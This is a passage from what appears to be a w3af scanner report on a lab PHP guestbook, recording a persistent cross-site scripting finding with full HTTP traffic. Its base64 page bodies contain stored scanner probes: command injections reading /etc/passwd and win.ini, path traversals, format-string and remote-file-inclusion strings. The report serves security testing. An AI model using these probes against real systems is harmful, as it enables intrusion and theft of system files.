PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[837, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://192.168.0.116:31337/post" var="message">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;ru2ft&lt;/-&gt;&quot; to the &quot;message&quot; parameter at http://192.168.0.116:31337/post, which is echoed when browsing to http://192.168.0.116:31337/. This vulnerability was found in the requests with ids 837 and 1175.</description>
        <http-transactions>
            <http-transaction id="837">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="33" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1ydTJmdCUzQyUyRi0lM0UmcHNldWRvPTU2
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
InJrZHhqIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjg1MTE4MjM1PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0
Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4v
ZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
QzoIb290LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5D
Oghvb3QuaW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVT
WVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkALmh0bWw8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NDExMTYxODU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YSkvKS8pLykvKS8pLykvKS8pLykvKS8p
LzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5hKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS88L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aFR0cDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5oVHRwOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmh0VHBz
Oi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0VHBzOi8vdzNhZi5vcmcvPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5m
VHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+dllVWm1oOFU8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW48L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+JW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4l
biVuJW4lbiVuJW48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW48L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJTwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5waW5nIC1u
IDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
Ly93M2FmLm9yZzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PCEtLTwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5GNzVKbXlZazwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4iPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiI8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aURvbnRFeGlzdDwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5pRG9u
dEV4aXN0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZg0KdnVsbmVyYWJsZTA3M2I6IGFlNTwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD53M2FmDQp2dWxuZXJhYmxlMDczYjogYWU1Y3czYWY8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZg12dWxuZXJhYmxlMDczYjogYWU1YzwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD53M2FmDXZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD53M2FmCnZ1bG5lcmFibGUwNzNiOiBhZTVjPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPncz
YWYKdnVsbmVyYWJsZTA3M2I6IGFlNWN3M2FmPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5zbGVlcCgz
KTs8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPmdueTRpPC8tPjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD5zcWdybi8qPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjV0bTgwIjV0bTgwPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmJzZWhyYGJzZWhyPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnVyc2t1ID08
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0dHA6Ly93M2FmLm9y
Zy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRt
bDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aFR0
UDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PnBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cnUyZnQ8Ly0+
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnFyOWxoLyo8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+d2xyc21gd2xy
c208L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+M2VydWsi
M2VydWs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+bjhl
MnEgPTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNy
L3NiaW4vcGluZyAtcyBsb2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5zbGVlcCgzMDAw
